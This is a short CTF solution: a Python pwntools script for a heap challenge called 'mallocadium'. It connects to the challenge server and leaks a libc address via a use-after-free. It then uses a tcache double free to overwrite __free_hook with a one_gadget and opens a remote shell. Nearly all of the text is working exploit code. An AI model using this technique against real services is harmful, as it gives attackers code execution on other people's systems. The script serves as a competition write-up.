Solution of mallocadium challenge

mallocadium.py

from pwn import * 
context.log_level='debug'
def alloc(id,size,data):
	r.recvuntil("Enter choice: ")
	r.sendline("1")
	r.recvuntil("Enter id: ")
	r.sendline(str(id))
	 
	r.recvuntil("Enter size of malloc: ")
	r.sendline(str(size))
	r.recvuntil("Enter data to malloc: ")
	r.sendline(data)
def copy(src,dst):
	r.recvuntil("Enter choice: ")
	r.sendline("2")
	r.recvuntil("Enter id of malloc you want to copy: ")
	r.sendline(str(src))
	 
	r.recvuntil("Enter destination id: ")
	r.sendline(str(dst))
def free(id):
	r.recvuntil("Enter choice: ")
	r.sendline("3")
	r.recvuntil("Enter id:")
	r.sendline(str(id))
def use(id):
	r.recvuntil("Enter choice: ")
	r.sendline("4")
	r.recvuntil("Enter id:")
	r.sendline(str(id))
r=remote("139.180.213.85", 10002)
for i in range(5,13):
	alloc(i,512,"1")

copy(12,13)
for i in range(5,13): #Fill 7 tcache entries
	free(i)
#The 8th entries will go to unsorted bins
use(13)#Leak libc
r.recvuntil("Data: ")
libc=u64(r.recvuntil("\n").strip("\n").ljust(8,'\x00'))-4111520
free_hook=libc+4118760
one_gadget=libc+0x4f322
print "libc: "+hex(libc)
alloc(0,128,"1"*128)#alloc A
copy(0,1)#Duplicate A pointer
free(0)#A 
free(1)#A -> A
alloc(20,128,p64(free_hook)) #A -> free_hook
alloc(21,128,p64(free_hook)) #free_hook
alloc(22,128,p64(one_gadget))#malloc(128)=free_hook 
free(22)#Trigger free_hook
#Got the shell
r.interactive()